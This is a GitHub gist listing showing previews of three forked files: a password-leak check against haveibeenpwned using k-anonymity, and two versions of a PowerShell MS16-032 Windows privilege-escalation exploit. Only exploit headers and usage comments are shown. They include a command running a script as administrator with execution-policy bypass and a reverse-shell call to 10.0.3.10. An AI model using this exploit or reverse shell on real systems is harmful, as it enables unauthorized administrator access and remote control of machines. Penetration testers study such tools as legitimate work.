thalex thalex
thalex
/ leakcheck_kanonymity.txt
Created
April 24, 2018 14:22
— forked from intrd/leakcheck_kanonymity.txt
One-liner password leak check + k-anonymity method (w/out exposing the password on request)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## One-liner password leak check + k-anonymity method (w/out exposing the password on request) | |
| # Compute the SHA1, Grab 1st 5 chars of the hash, check by range on huge haveibeenpwnd DB! | |
| # original source: https://news.ycombinator.com/item?id=16432344 | |
| VARPWD='test123'; HASH=`echo -n $VARPWD | sha1sum`; curl --silent https://api.pwnedpasswords.com/range/`cut -b 1-5 <(echo $HASH)` --stderr - | grep -i `cut -b 6- <(echo $HASH) | cut -d ' ' -f 1` |
thalex
/ ms16_032_intrd_mod.ps1
Created
June 24, 2017 15:32
— forked from intrd/ms16_032_intrd_mod.ps1
MS16-032 priv escalation exploit modded - interactive shell & command argv
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## intrd's MS16-032 priv escalation exploit modded - interactive shell & command argv | |
| # exploit MS16-032 and run shell.ps1(ATTACHMNT) as administrator: Invoke-MS16-032 "-NoProfile -ExecutionPolicy Bypass -Command Import-Module C:\Users\IEUser\Desktop\shell.ps1;Start-Sleep -s 10" | |
| # reverse shell as current user: Invoke-PowerShellTcp -Reverse -IPAddress 10.0.3.10 -Port 4567 | |
| function Invoke-MS16-032 { | |
| <# | |
| .SYNOPSIS | |
| PowerShell implementation of MS16-032. The exploit targets all vulnerable |
thalex
/ MS16-032.ps1
Created
June 24, 2017 15:16
— forked from benichmt1/MS16-032.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-MS16-032 { | |
| <# | |
| .SYNOPSIS | |
| PowerShell implementation of MS16-032. The exploit targets all vulnerable | |
| operating systems that support PowerShell v2+. Credit for the discovery of | |
| the bug and the logic to exploit it go to James Forshaw (@tiraniddo) and @Fuzzysec for the original PS script. | |
| Modifications by Mike Benich (@benichmt1). | |
| Targets: |